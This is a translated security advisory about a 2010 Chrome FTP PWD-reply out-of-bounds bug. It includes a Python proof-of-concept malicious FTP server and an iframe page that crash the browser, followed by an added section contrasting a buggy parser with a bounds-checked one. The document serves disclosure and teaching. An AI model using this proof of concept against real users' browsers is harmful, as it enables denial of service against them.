Google Chrome Out-of-Bounds Array Index Denial of Service Vulnerability in FTP PWD Response Handling

Release date: 2010-03-31
Update date: 2010-03-31

Affected systems:
Google Chrome <= 4.1.249.1042 (Build 42199)
Description:
Google Chrome is a web browser developed by Google.

Google Chrome does not correctly handle the server's response to the FTP PWD command: the implementation indexes an array out of bounds when parsing the 257 reply. By luring a victim into opening a crafted web page that contains an iframe pointing at a malicious FTP server, a remote attacker can crash the browser (denial of service). The advisory reports a crash only; no code execution is claimed.

<*Source: Tobias Klein
  
  Link: http://www.enigmagroup.org/exploits/platform/windows/dos/21248/%22Google-Chrome-4.1-OOB-Array-Indexing-Bug%22.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Malicious FTP server:

K:\BUGS\CHROME>type poc.py
from socket import *
from time import sleep

# Minimal fake FTP server (Python 3 syntax). It answers Chrome's login
# sequence with canned replies and then returns an empty quoted pathname
# in response to PWD, which is the reply that triggers the crash.
host = "0.0.0.0"
port = 21

def reply(conn, line):
    # FTP control replies are CRLF-terminated; sockets take bytes.
    conn.send((line + "\r\n").encode("ascii"))

s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(1)
print("\n[+] Google Chrome (4.1.249.1042) Denial of Service poc")
print("[+] Listening on port %d ..." % port)

cl, addr = s.accept()
print("[+] Connection accepted from %s" % addr[0])

# Greeting banner sent as soon as the client connects
reply(cl, "220 Google Chrome (4.1.249.1042) Denial of Service poc")

cl.recv(128)                          # client command (expected: USER)
reply(cl, "331 Password required for anonymous.")

cl.recv(128)                          # client command (expected: PASS)
reply(cl, "230 User anonymous logged in.")

cl.recv(128)                          # client command (expected: SYST)
reply(cl, "215 UNIX Type: bib")

cl.recv(128)                          # client command (expected: PWD)
reply(cl, "257 \"\"")                 # empty quoted pathname: the trigger

print("[+] Sending buffer: OK\n")

sleep(1)
cl.close()
s.close()
- - - - - ---

Start the poc server:

K:\BUGS\CHROME>python poc.py

[+] Google Chrome (4.1.249.1042) Denial of Service poc
[+] Listening on port 21 ...


Open the following sample HTML page in Chrome:

- - - - - ---
<html>
<body>
  <iframe name="POC" src="ftp://127.0.0.1"></iframe>
</body>
</html>
- - - - - ---
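The reply that matters in the exchange above is the last one, 257 "" (a PWD reply with an empty quoted pathname). RFC 959 defines the PWD reply as 257 "<pathname>" followed by an optional comment, with a literal quote inside the pathname sent as two quotes (""). The added example below is not part of the original advisory and is not Chrome's code: it shows a bounds-checked parser for that reply next to an illustrative buggy parser (an assumption about the failure class, not a reconstruction of Chrome's implementation) whose look-ahead for a doubled quote reads one character past the end of the line exactly when the pathname is empty. The example also covers doubled-quote escaping and malformed replies, which the PoC itself does not exercise.

```python
"""Parsing an FTP 257 (PWD) reply safely.

Added example, not from the advisory or from Chrome. RFC 959 format:
    257 "<pathname>" optional comment
A literal quote inside <pathname> is transmitted as two quotes ("").
"""

PWD_REPLY_CODE = "257"


def naive_pwd_path(reply: str) -> str:
    """Illustrative buggy parser (an assumption, NOT Chrome's code).

    It treats '""' as an escaped quote, but the look-ahead body[i + 1]
    is never bounds-checked.  When the closing quote is the last
    character of the line, as in the PoC's reply 257 "", the look-ahead
    indexes past the end: an out-of-bounds read in a C/C++ client, an
    IndexError here.
    """
    body = reply[len(PWD_REPLY_CODE) + 1:]   # text after "257 "
    i = body.index('"') + 1                  # first char of the pathname
    path = []
    while True:
        if body[i] == '"':
            if body[i + 1] == '"':           # unchecked look-ahead
                path.append('"')
                i += 2
                continue
            break                            # lone quote ends the pathname
        path.append(body[i])
        i += 1
    return "".join(path)


def naive_parser_crashes(reply: str) -> bool:
    """True if the buggy parser raises on this reply (would read OOB)."""
    try:
        naive_pwd_path(reply)
    except IndexError:
        return True
    return False


def parse_pwd_reply(reply: str):
    """Return the pathname from a 257 reply, or None if it is malformed.

    Every index is checked against len(body), so an empty pathname
    (257 ""), a missing opening quote, a missing closing quote or a
    wrong reply code yields "" or None instead of an exception.
    """
    code, _, body = reply.partition(" ")
    if code != PWD_REPLY_CODE:
        return None
    start = body.find('"')
    if start < 0:
        return None                          # no quoted pathname at all
    path = []
    i, n = start + 1, len(body)
    while i < n:
        ch = body[i]
        if ch != '"':
            path.append(ch)
            i += 1
        elif i + 1 < n and body[i + 1] == '"':
            path.append('"')                 # doubled quote -> literal quote
            i += 2
        else:
            return "".join(path)             # lone quote closes the pathname
    return None                              # ran off the end: unterminated


if __name__ == "__main__":
    # Constructed sample replies, including the PoC trigger.
    samples = ['257 "/home/user" is current directory',
               '257 "a""b"', '257 ""', '257 "unterminated']
    for line in samples:
        print(repr(line), "->", repr(parse_pwd_reply(line)),
              "| naive crashes:", naive_parser_crashes(line))
```

The point of the contrast is that both parsers agree on ordinary replies; only the malformed or degenerate ones separate them, which is why a client-side FTP parser should be fuzzed with empty, unterminated and quote-doubled pathnames rather than only with the replies a well-behaved server sends.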

Recommendation:
Vendor patch:

Google
------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:

http://www.google.com

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.